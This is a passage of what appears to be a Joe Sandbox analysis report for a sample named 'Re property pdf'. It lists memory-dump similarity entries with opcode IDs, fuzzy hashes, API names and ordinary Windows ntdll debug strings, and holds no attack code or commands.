                                                                                                                              • Instruction ID: b1ab0acdedbbb1e518239a1bdea7ab0d3506b3f230abb9221dca74ee843f2cf1
                                                                                                                              • Opcode Fuzzy Hash: f1290cbb3d5f955779e53ec5ede2fc409c7b90f077545d2caec4c7addc98e6a2
                                                                                                                              • Instruction Fuzzy Hash: 4101F7315402119FCB32AF69C490D7ABBFAFFA16A0B94446EE2C55B611CB39FC41CB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                              • Instruction ID: 722d497f2b585f664f47c26630db3bac30a7aad9bec70c990e37326a84df895b
                                                                                                                              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                              • Instruction Fuzzy Hash: 8001F532100709DFDB62A6A9C900BB777E9FFC4714F14485AAA86CB550DE70E902D790
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9ae26f851a4f5280a4f503fbc13bbc22b6ee40b53c46e12035613b5b7b269d3e
                                                                                                                              • Instruction ID: 9944838b4c9f3d5f1c0838d196436ca4bd792c1a28a12bf1184e4933e0a08323
                                                                                                                              • Opcode Fuzzy Hash: 9ae26f851a4f5280a4f503fbc13bbc22b6ee40b53c46e12035613b5b7b269d3e
                                                                                                                              • Instruction Fuzzy Hash: 4D118075A0120DEFDB05EFA4D891FAE7BB5FB54340F0040A9F9819B250DA35AE11CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 58c064f67ed2389c0bf5053173a821f85d7550abdbfca622b109c736644828db
                                                                                                                              • Instruction ID: a9aaa6ba5bb1a604389d4e06e6a4927b604ea8c02f609958010235c9ef31faac
                                                                                                                              • Opcode Fuzzy Hash: 58c064f67ed2389c0bf5053173a821f85d7550abdbfca622b109c736644828db
                                                                                                                              • Instruction Fuzzy Hash: 9001F7716005057FC311BB79CD80E97B7BCFF94664B000629B24587550DB38EC11C6E0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                              • Instruction ID: b7953539d400e20f1f13d01ca4b262b5e93282d3b34c451884dcae427cfed920
                                                                                                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                              • Instruction Fuzzy Hash: BEF06D7220001DBFEF02AF94CD80DEF7B7EEB592A8B114124FA0092020D632DD21ABA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 688a41428f2a5222247d1a227c9eee894681987ad67cd1f8b7f6ca90a70a82ad
                                                                                                                              • Instruction ID: db34553ce1f6e67423cebf2e26692c2ad0210345d689fa6951d9f468aeb2b724
                                                                                                                              • Opcode Fuzzy Hash: 688a41428f2a5222247d1a227c9eee894681987ad67cd1f8b7f6ca90a70a82ad
                                                                                                                              • Instruction Fuzzy Hash: B8018936204149EBCF12AE84DC40EDE3FA6FB4C664F058116FE9866620C736D9B0EB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 224823fa5ef1ee8d23b4852b5d990b30575418e2d94e32e87099c53d1eb2899a
                                                                                                                              • Instruction ID: 178654d02b7adec50f50e684cb09bdb211babb080dc0c7d9b4c41ccad54f7d79
                                                                                                                              • Opcode Fuzzy Hash: 224823fa5ef1ee8d23b4852b5d990b30575418e2d94e32e87099c53d1eb2899a
                                                                                                                              • Instruction Fuzzy Hash: E3F02B7260432D5BF314A5159E01B72329ADFD0760F69807AEB058F3E2FA71DC11A3D5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3540ae7af38a095c82a1e38f418e6199ab6d0c80ddda7f8c9e303d99d4dc1a9f
                                                                                                                              • Instruction ID: dbe9d9d9f2745d34a1d08a43b50bdb5876c6aa81cbc5d3b99a4f4613b0100c26
                                                                                                                              • Opcode Fuzzy Hash: 3540ae7af38a095c82a1e38f418e6199ab6d0c80ddda7f8c9e303d99d4dc1a9f
                                                                                                                              • Instruction Fuzzy Hash: 7901A970701681ABE372AB2CCD48B6937E8BB80B04F4841E4B9C1CB9D6D729D5018214
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                              • Instruction ID: 5fa7d7642087f5c3ea9d2b4ae99a1e360b971a24a2162a2b5be7c937514db42b
                                                                                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                              • Instruction Fuzzy Hash: F7F0593F341D1347E7B5AAAE8860B6EBAD5AFD0B00B4D856C96C1DB240CFA0C8048380
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                              • Instruction ID: 603e36bc5b9e87463988002d03c47b1f836e03d945135c1123f48eabe5c6b3e7
                                                                                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                              • Instruction Fuzzy Hash: BBF08933729521DBD371AA4DCC80F1AB7A8EFD5A60F590075A6C89F264C760EC01C7D0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 584e93f9e1a7715889f80e107cbe325311f8f641b00d77cfe3f109eaa414485c
                                                                                                                              • Instruction ID: 7c81f1dfccb0ff49999d02cc215b260c1290a64a73be1727b7fa4214e403e0c1
                                                                                                                              • Opcode Fuzzy Hash: 584e93f9e1a7715889f80e107cbe325311f8f641b00d77cfe3f109eaa414485c
                                                                                                                              • Instruction Fuzzy Hash: ABF0AFB06193049FD310FF68C542A5BB7E4FF98710F80865AB8D8DB394EA34E900CB96
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                              • Instruction ID: f7c53c318f2cc40d27bf20e373d35db4d0f2a7046e6295aaa8280c76cbb9856f
                                                                                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                              • Instruction Fuzzy Hash: BDF0B472610204AFE714DF25CC01F96B6EDEFD8340F148079A585DB164FAB5DD01D694
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d93374dd00e1616283cc45497671357ff9a32d866b942f9cb46e72698a443722
                                                                                                                              • Instruction ID: 80a3c4cd7e08250f0e99044255c0c3458b9979642f393512852631909adacabe
                                                                                                                              • Opcode Fuzzy Hash: d93374dd00e1616283cc45497671357ff9a32d866b942f9cb46e72698a443722
                                                                                                                              • Instruction Fuzzy Hash: 5EF062B0A0124DDFDB04EFA9D555A9EB7F4FF18300F108069B995EB385DA38EA01CB64
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 734f4c77731499af7ec1d54afcfeae8b926eca41caabd89d650eee6beccae1ba
                                                                                                                              • Instruction ID: 1cec38c25e35761576297e6568f76c1bd7bacd0264689847310671b4217b054c
                                                                                                                              • Opcode Fuzzy Hash: 734f4c77731499af7ec1d54afcfeae8b926eca41caabd89d650eee6beccae1ba
                                                                                                                              • Instruction Fuzzy Hash: 73F0F0719026D59EF7638F2CC004B69BBC49B00A21F084CEAD7C9C3582C3B4DB80C708
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2e5dc9bd8e93c2923b75060d54fe3e9a3f74bcefa95a701920b4b3b3adf17824
                                                                                                                              • Instruction ID: 04a7ccacf4ed87364e91c959fc69e4b3dfae8576f11f1b7ec219dea9300a6d8a
                                                                                                                              • Opcode Fuzzy Hash: 2e5dc9bd8e93c2923b75060d54fe3e9a3f74bcefa95a701920b4b3b3adf17824
                                                                                                                              • Instruction Fuzzy Hash: 6FF0273A41A68586CF726B2CA8A23D9AB98E781910F0910CDECE05760DC57B8483CB20
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0eef3c045ffd9adcb5000ce5ddfb8ba32dcfe04ee396a3d2de76bc2d2c5abdc6
                                                                                                                              • Instruction ID: eb177211407c5c9ea66a7387a24e67a916179d7dd09c5479923b44156260b87b
                                                                                                                              • Opcode Fuzzy Hash: 0eef3c045ffd9adcb5000ce5ddfb8ba32dcfe04ee396a3d2de76bc2d2c5abdc6
                                                                                                                              • Instruction Fuzzy Hash: E7F052754012809FF3A2971CC708B51BBDCAB887A0F0C94A7D5C2D3522C770E880DA40
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                              • Instruction ID: 4fa78ebbd7061b80450022f06fade9589453f9bb04727cb92096e0e0e2737a0a
                                                                                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                              • Instruction Fuzzy Hash: FCE0D8723006016BE7119F599CC4F877BAEDFDAB10F040079B5045F251C9E6DC0986A4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                              • Instruction ID: fb069ca7613eb8b86db636f7b8715764c3c02b99cfd8ce0da888ef620f381c11
                                                                                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                              • Instruction Fuzzy Hash: 3AF0A0721002049FE7208F09DD80F53BBF8EB85364F01C066F6488B160D33AEC40DBA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 344d47e5801ba75f51cc8e63cb3e68d11a321407554196272a3bd658d309a3df
                                                                                                                              • Instruction ID: 1e70910881921cb7758119d3131569722fd73bd038e88adc5f62c16e3afedc77
                                                                                                                              • Opcode Fuzzy Hash: 344d47e5801ba75f51cc8e63cb3e68d11a321407554196272a3bd658d309a3df
                                                                                                                              • Instruction Fuzzy Hash: BEE092721009549BC322FB29DD01FCA779AEB64360F014529B19597190CA35A810C7C8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fbdf6f3ffc42c590840d0db64cd067ab6b39c1678aa558d0a24730d20775883f
                                                                                                                              • Instruction ID: dc56536a59b16243961e024de3d31386e7d5a925fd55e310951a29d8e4419005
                                                                                                                              • Opcode Fuzzy Hash: fbdf6f3ffc42c590840d0db64cd067ab6b39c1678aa558d0a24730d20775883f
                                                                                                                              • Instruction Fuzzy Hash: 84D0A734D01449CBEF17DF08C618D6E36F4FB54640B4000ADE7C0A2420E72ADC02C700
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                              • Instruction ID: 18847098a5d0c970b0333a007b04b5240ab75a346aeb2267bc10791a276468cb
                                                                                                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                              • Instruction Fuzzy Hash: B6D0C935312E80CFD65BCB0CC5A4B5533E8BB44B44F8144D0F481CBB2AD62CD980CA00
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                              • Instruction ID: 9aff8eaeb19cf3f80f5241ec92c1723ff2f1b28db75a38da61261eaa3cee6f60
                                                                                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                              • Instruction Fuzzy Hash: 4FC01232290648AFC712AA99CD01F427BA9EBA8B50F000021F2048B670D635E820EA84
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                              • Instruction ID: a8a0918c099161883d89b1ee381b2df01208f1671ae1b3bb64ed315f40356f9f
                                                                                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                              • Instruction Fuzzy Hash: 62D01236100248EFCB01DF41C890D9A772AFBD8710F108019FD19076108A31ED62DA90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                              • Instruction ID: 2f4d67c7a5a338cc334929ddcaa2820062c2ebb1e0f97d6d42d75f8289443e0a
                                                                                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                              • Instruction Fuzzy Hash: 2CC04C797015458FCF55DB19D294F4677E4F744750F1508D0E985CB721E624E901CA10
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              • Opcode ID: 47edde6a9ede95ec09698f94d06628519bcac058df7fdfa37677d119c9c55eb3
                                                                                                                              • Instruction ID: 84230cc08c04a90e863ed86b6691df3af8f5774d5479452f223311cd5fa027fc
                                                                                                                              • Opcode Fuzzy Hash: 47edde6a9ede95ec09698f94d06628519bcac058df7fdfa37677d119c9c55eb3
                                                                                                                              • Instruction Fuzzy Hash: 6951A3F6B04116ABDB51DB9C98D097EFBF8BB48240B148269F5E5D7642D334EE408BA0
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              • Opcode ID: 0615047b674ab484b81f8c1f59c7d5d536c7ed587245f13c53b3ed13802e1734
                                                                                                                              • Instruction ID: 5e5c714c26b5cd6d868402dfd08a0ef281b999fd8aaaeb7293d617a1e10e6150
                                                                                                                              • Opcode Fuzzy Hash: 0615047b674ab484b81f8c1f59c7d5d536c7ed587245f13c53b3ed13802e1734
                                                                                                                              • Instruction Fuzzy Hash: C651E571A00645AECB64DE5CC8D09BFB7F9AF44300B448459E5D6D7681EB74FA40C760
                                                                                                                              Strings
                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01074655
                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01074787
                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010746FC
                                                                                                                              • ExecuteOptions, xrefs: 010746A0
                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01074725
                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01074742
                                                                                                                              • Execute=1, xrefs: 01074713
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                              • API String ID: 0-484625025
                                                                                                                              • Opcode ID: 819bacc7e217bb793720912b197179f187dfcf1f61f3fbb966d464d5786f8667
                                                                                                                              • Instruction ID: 0019591cc30ee6326e8eefaad7049648be94b453a9533e4092a85a10fc9f1319
                                                                                                                              • Opcode Fuzzy Hash: 819bacc7e217bb793720912b197179f187dfcf1f61f3fbb966d464d5786f8667
                                                                                                                              • Instruction Fuzzy Hash: 595127B1A0021A7AEB21AAA9DC95FEE77ACFB58300F0400E9E685A7180D7719A41DF55
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-$0$0
                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                              • Instruction ID: 444864ea913ab62c65c29d0fcf2e299bade3f1472fe2180314761ac9fc68ce11
                                                                                                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                              • Instruction Fuzzy Hash: 7F819DB0A052499FEF25DE6CC8D17FEBBE2BF49320F1841A9D8D1A7291C634D841CB51
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                              • Opcode ID: 045a922e604a502aa1a08d70236d9877c4981158c7ddd0005f7e90daefe3e9f9
                                                                                                                              • Instruction ID: 82f19381892299d644da6c8115586c9f2458f7324a6c6f4cae9f35b19558e48a
                                                                                                                              • Opcode Fuzzy Hash: 045a922e604a502aa1a08d70236d9877c4981158c7ddd0005f7e90daefe3e9f9
                                                                                                                              • Instruction Fuzzy Hash: 6B2167BAA00119ABDB50DF79DC90AFF7BF8EF64640F040566ED45D3240E730E9028B91
                                                                                                                              Strings
                                                                                                                              • RTL: Re-Waiting, xrefs: 0107031E
                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010702E7
                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010702BD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                              • API String ID: 0-2474120054
                                                                                                                              • Opcode ID: 597fdb982df08d77e2110d4f467430789da692839e20fe2ad09d1820c14a2ae5
                                                                                                                              • Instruction ID: 2e0a9841763de1c1d3ee4013897649ef393fed487975c32dab70dc86440697e6
                                                                                                                              • Opcode Fuzzy Hash: 597fdb982df08d77e2110d4f467430789da692839e20fe2ad09d1820c14a2ae5
